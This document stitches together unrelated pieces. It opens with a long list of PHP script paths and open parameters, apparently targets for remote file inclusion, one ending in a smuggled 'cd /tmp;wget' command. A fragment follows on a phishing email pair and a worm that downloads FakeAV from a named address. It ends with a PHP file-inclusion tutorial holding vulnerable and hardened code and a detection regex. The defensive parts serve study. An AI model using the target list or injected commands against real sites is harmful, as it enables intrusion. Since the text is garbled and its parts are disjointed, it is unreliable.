modules/My_eGallery/index.php?basepath=
modules/newbb_plus/class/forumpollrenderer.php?bbPath=
journal.php?m=
index.php?m=
links.php?c=
forums.php?m=
list.php?c=
user.php?xoops_redirect=
index.php?id=
r.php?url=
CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=
inc/formmail.inc.php?script_root=
include/init.inc.php?G_PATH=
backend/addons/links/index.php?PATH=
modules/newbb_plus/class/class.forumposts.php?bbPath[path]=
htmltonuke.php?filnavn=
mail_autocheck.php?pm_path=
index.php?p=
modules/4nAlbum/public/displayCategory.php?basepath=
e107/e107_handlers/secure_img_render.php?p=
include/new-visitor.inc.php?lvc_include_dir=
path_of_cpcommerce/_functions.php?prefix=
community/modules/agendax/addevent.inc.php?agendax_path=
library/editor/editor.php?root=
library/lib.php?root=
zentrack/index.php?configFile=
pivot/modules/module_db.php?pivot_path=
main.php?x=
myPHPCalendar/admin.php?cal_dir=
index.php/main.php?x=
index.php?x=
index.php?open=
index.php?visualizar=
template.php?pagina=
index.php?inc=
includes/include_onde.php?include_file=
index.php?pg=
index.php?show=
index.php?cat=
print.php?val1=
cmd.php?function=
iframe.php?file=
os/pointer.php?url=
p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=
index.php?file=
db.php?path_local=
phpGedView/individual.php?PGV_BASE_DIRECTORY=
index.php?kietu[url_hit]=
phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=
Sources/Packages.php?sourcedir=
yabbse/Sources/Packages.php?sourcedir=
modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
cgi-bin//gadgets/Blog/BlogModel.php?path=
cgi-bin//admin.php?cal_dir=
gallery/captionator.php?GALLERY_BASEDIR=
cgi-bin/main.php?x=
Blog/BlogModel.php?path=
admin.php?cal_dir=
expanded.php?conf=
mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
pollvote/pollvote.php?pollname=
displayCategory.php?basepath=
phpBB2/admin/admin_cash.php?phpbb_root_path=
modules/foro/includes/functions_admin.php?phpbb_root_path=
modules/Forums/admin/admin_forums.php?phpEx=
modules/Forums/admin/admin_disallow.php?phpEx=
modules/Forums/admin/admin_smilies.php?phpEx=
modules/Forums/admin/admin_board.php?phpEx=
modules/Forums/admin/admin_users.php?phpEx=
modules/Forums/admin/admin_mass_email.php?phpEx=
modules/Forums/admin/admin_forum_prune.php?phpEx=
modules/Forums/admin/admin_styles.php?phpbb_root_path=
index.php?hc=
mt-comments.cgi?id=
webcalendar/tools/send_reminders.php?includedir=
cmd/product_info.php/products_id/1622/shop_content.php?coID=
addevent.inc.php?agendax_path=
step_one.php?server_inc=
upgrade_album.php?GALLERY_BASEDIR=
search.php?cutepath=
modules.php?name=
wagora/extras//quicklist.php?site=
vCard/admin/define.inc.php?match=
forum/ubbthreads.php?Cat=
admin/includes/classes/spaw/spaw_control.class.php?spaw_root=
secure.php?cfgProgDir=
modules/My_eGallery/public//inc/?HCL_path=
modules/My_eGallery/public/imagen.php?basepath=
adlayer.php?layerstyle=
Forums/bb_smilies.php?name=
modules/Forums/bb_smilies.php?name=
gadgets/Blog/BlogModel.php?path=
learnlinc/clmcpreload.php?CLPATH=
modernbill/samples/news.php?DIR=
religions/faq.php?page=
forum/viewtopic.php?t=
announcements.php?includePath=
inc/header.php/step_one.php?server_inc=
phpatm/index.php?include_location=
gb/form.inc.php3?lang=
shannen/index.php?x=
family/phpgedview/index.php?PGV_BASE_DIRECTORY=
main.php?left=
forum/misc.php?action=
nucleus/libs/globalfunctions.php?DIR_LIBS=
show_archives.php?cutepath=
gallery.php=
magicforum/misc.php?action=
forum/admin/actions/del.php?include_path=
index.php?meio=
local/investing_industrialeastate1.php?a=
modules/coppermine/themes/default/theme.php?THEME_DIR
Popper/index.php?childwindow.inc.php?form=
class.mysql.php?path_to_bt_dir=
include/footer.inc.php?_AMLconfig[cfg_serverpath]=
eyeos/desktop.php?baccio=
ashnews.php?pathtoashnews=
index.php?modpath=
index.php?sqld=
modules/module_db.php?pivot_path=
catalog/includes/include_once.php?include_file=
cgi-bin/calendar.pl?fromTemplate=
live/inc/pipe.php?HCL_path=
zb41/include/write.php?dir=
cgi-bin/awstats.pl?logfile=
presse/stampa.php3?azione=
inc/step_one_tables.php?server_inc=
index.php?mainpage=
phpprojekt/lib/authform.inc.php?path_pre=
captionator.php?GALLERY_BASEDIR=
_head.php?_zb_path=.example.com
achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=
gallery/captionator.php?GALLERY_BASEDIR=.example.com
globals.php3?LangCookie=.example.com
include/msql.php?inc_dir=
include/mssql7.php?inc_dir=
include/mysql.php?inc_dir=
include/oci8.php?inc_dir=
include/postgres.php?inc_dir=
include/postgres65.php?inc_dir=
install.php?phpbb_root_dir=
mantis/login_page.php?g_meta_inc_dir=
page.php?template=
phorum/admin/actions/del.php?include_path=
pollensondage.inc.php?app_path=
user/agora_user.php?inc_dir=
user/ldap_example.php?inc_dir=
userlist.php?ME=.example.com
_functions.php?prefix=
cpcommerce/_functions.php?prefix=
ashnews.php?pathtoashnews=cd /tmp;wget
eblog/blog.inc.php?xoopsConfig[xoops_url]=
b2-tools/gm-2-b2.php?b2inc=
includes/include_once.php?include_file=
modules.php?name=jokeid=
index.php?site=
livehelp/inc/pipe.php?HCL_path=
hcl/inc/pipe.php?HCL_path=
support/faq/inc/pipe.php?HCL_path=
help/faq/inc/pipe.php?HCL_path=
helpcenter/inc/pipe.php?HCL_path=
live-support/inc/pipe.php?HCL_path=
gnu3/index.php?doc=
gnu/index.php?doc=
phpgwapi/setup/tables_update.inc.php?appdir=
includes/calendar.php?phpc_root_path=
includes/setup.php?phpc_root_path=
inc/authform.inc.php?path_pre=
include/authform.inc.php?path_pre=
web_statistics/modules/coppermine/themes/default/theme.php?THEME_DIR=
web_statistics//tools/send_reminders.php?includedir=
web_statistics//include/write.php?dir=
web_statistics//modules/My_eGallery/public/displayCategory.php?basepath=
web_statistics//calendar/tools/send_reminders.php?includedir=
web_statistics//skin/zero_vote/error.php?dir=
web_statistics//coppercop/theme.php?THEME_DIR=
includes/header.php?systempath=
Gallery/displayCategory.php?basepath=
index.inc.php?PATH_Includes=
nphp/nphpd.php?nphp_config[LangFile]=
ashheadlines.php?pathtoashnews=
demo/includes/init.php?user_inc=
jaf/index.php?show=
inc/shows.inc.php?cutepath=
poll/admin/common.inc.php?base_path=
sources/post.php?fil_config=
bb_lib/checkdb.inc.php?libpach=
include/livre_include.php?chem_absolu=
index.php?pageurl=
derniers_commentaires.php?rep=
modules/coppermine/themes/default/theme.php?THEME_DIR=
coppermine/themes/maze/theme.php?THEME_DIR=
allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
agendax/addevent.inc.php?agendax_path=
main.php?page=
default.php?page=
index.php?action=
index1.php?p=
index2.php?x=
index2.php?content=
index.php?conteudo=
GradeMap/index.php?page=
phpopenchat/contrib/yabbse/poc.php?sourcedir=
calendar/calendar.php?serverPath=
calendar/functions/popup.php?serverPath=
calendar/events/header.inc.php?serverPath=
calendar/events/datePicker.php?serverPath=
calendar/setup/setupSQL.php?serverPath=
calendar/setup/header.inc.php?serverPath=
install/index.php?G_PATH=
support/mailling/maillist/inc/initdb.php?absolute_path=
coppercop/theme.php?THEME_DIR=
dotproject/modules/projects/addedit.php?root_dir=
dotproject/modules/projects/view.php?root_dir=
dotproject/modules/projects/vw_files.php?root_dir=
dotproject/modules/tasks/addedit.php?root_dir=
dotproject/modules/tasks/viewgantt.php?root_dir=
My_eGallery/public/displayCategory.php?basepath=
index.php?meio.php=
index.php?configFile=
index.php?do=
phpshop/index.php?base_dir=
contacts.php?cal_dir=
convert-date.php?cal_dir=
Do you notice the connection between these two emails?
In fact, they are a pair of emails from the same hacker scenario. The interaction plays out as follows:
The first email has no attachment and has only one job: making the recipient believe an appealing story: someone knows you from the Internet, wants to get acquainted and will send you a few photos. To the user this email looks harmless, and certainly quite a few people reply to this friend-request email.
Not long afterwards, the user receives another email, this time with the "photo file" attached as mentioned in the previous email. Many users, convinced by this fairly logical, interactive scenario, opened the attachment, and so their computers were infected with the virus.
This virus (which Bkav detects as W32.FakeHotpics.Worm), when executed, downloads FakeAV from the address: http://webcontrol-panel.us/l[removed]atch/softpatch.php?afid=154
I. INTRODUCTION
Code:
<?php
// The file name is fixed in the source: the request cannot change it.
include("config.php");
?>
Code:
<?php
// The file name comes from $page, a variable the request can set (see the note below).
include($page);
?>
Note: if register_globals is set to off in the PHP configuration (php.ini), the variable $page is not treated as a global variable and therefore cannot be changed through the URL. The include statement would then have to use $_GET['page'], $_POST['page'], $_REQUEST['page'] or $_COOKIE['page'] instead of $page.
Assume register_globals is enabled. We then pass an arbitrary argument in the URL, and the code includes the file we specify; if that file does not exist, an error is reported but the script keeps running.
Other PHP functions, require and require_once, have the same effect as include, but if an error occurs the script stops. The difference between include_once and include, or between require_once and require, is that require_once and include_once prevent the same file from being included or required more than once.
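The dynamic include described above, written as it must be with register_globals off, next to a hardened version. This is an added example, not code from the original article; the pages/ directory, the page map and the file names in it are assumed for illustration.

```php
<?php
// Added example (not from the original article). The request-controlled
// include beside an allow-listed one. PAGE_DIR and the PAGES map are assumed.

// VULNERABLE: the request decides which file is included. $page can be a
// traversal path such as ../../etc/passwd or, with allow_url_include on,
// a remote URL. With register_globals on, include($page) is the same bug.
function render_page_vulnerable(): void
{
    $page = $_GET['page'] ?? 'home.php';
    include($page);
}

// HARDENED: the request selects a key, never a path. Only files listed in a
// fixed map inside a fixed directory can ever be included.
const PAGE_DIR = __DIR__ . '/pages';            // assumed layout
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Returns the absolute path of the page file, or null if the key is unknown
// or the resolved path does not lie inside PAGE_DIR.
function resolve_page(string $requested): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null;                            // unknown key: refuse
    }
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    $base = realpath(PAGE_DIR);
    // Defence in depth: even a mistaken map entry cannot escape PAGE_DIR.
    if ($path === false || $base === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function render_page_hardened(): void
{
    $path = resolve_page((string) ($_GET['page'] ?? 'home'));
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

render_page_hardened();
```

The key point is that user input never becomes a file name: it is only a lookup key into a map the developer controls, and the realpath check guarantees that even a bad map entry cannot include anything outside the pages directory. On the configuration side, register_globals was removed in PHP 5.4 and allow_url_include has defaulted to Off since it was introduced in PHP 5.2, so remote inclusion needs both a dynamic include and a weakened php.ini.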
Check the website's robots.txt and then test the site against that file, for example www.example.com/page=robots.txt, to see how the server handles this query.
You can use Google CodeSearch to look for File Inclusion bugs with the following regular expression:
http://www.google.com/codesearch
lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)
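The same pattern can be run locally over your own code as a first-pass audit. The script below is an added example, not from the original article or from Google CodeSearch; it applies the article's regular expression as a PCRE (extended with $_REQUEST, which the note above also names as a request source) to the files given on the command line, or, with no arguments, to a constructed sample embedded in the script.

```php
<?php
// Added example (not from the original article): a small static checker that
// applies the article's CodeSearch pattern to PHP source on disk. With no
// arguments it scans the constructed sample below.

// The article's pattern as a PCRE. $_REQUEST is added to the superglobal list.
const INCLUSION_PATTERN =
    '/\b(include|require)(_once)?\s*[\'"(]?\s*\$_(GET|POST|COOKIE|REQUEST)\b/';

// Returns one ['line' => n, 'code' => text] entry per matching source line.
function find_dynamic_includes(string $source): array
{
    $hits = [];
    foreach (preg_split('/\R/', $source) as $i => $line) {
        if (preg_match(INCLUSION_PATTERN, $line)) {
            $hits[] = ['line' => $i + 1, 'code' => trim($line)];
        }
    }
    return $hits;
}

// Constructed sample: two request-controlled includes (lines 3 and 4) and
// two includes whose file names are not taken directly from the request.
$sample = <<<'PHP'
<?php
include("config.php");
include($_GET['page']);
require_once ($_COOKIE["lang"] . ".php");
$tpl = 'default';
require "templates/$tpl.php";
PHP;

if ($argc > 1) {
    foreach (array_slice($argv, 1) as $file) {
        $source = file_get_contents($file);
        if ($source === false) {
            fwrite(STDERR, "cannot read $file\n");
            continue;
        }
        foreach (find_dynamic_includes($source) as $hit) {
            printf("%s:%d: %s\n", $file, $hit['line'], $hit['code']);
        }
    }
} else {
    foreach (find_dynamic_includes($sample) as $hit) {
        printf("sample:%d: %s\n", $hit['line'], $hit['code']);
    }
}
```

Run as `php scan.php path/to/*.php`. The pattern only catches the superglobal used directly inside the include expression; an include through an intermediate variable (`$page = $_GET['page']; include $page;`) or through $_SERVER is not matched, so a hit list from this script is a starting point for review, not proof that the remaining includes are safe.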
Read more in this article at: http://www.hvaonline.net/hvaonline/posts/list/36793.hva
You can also read more at :)): CEH.vn
KMA
SinhvienIT
WIKI
See how dangerous it is :)))))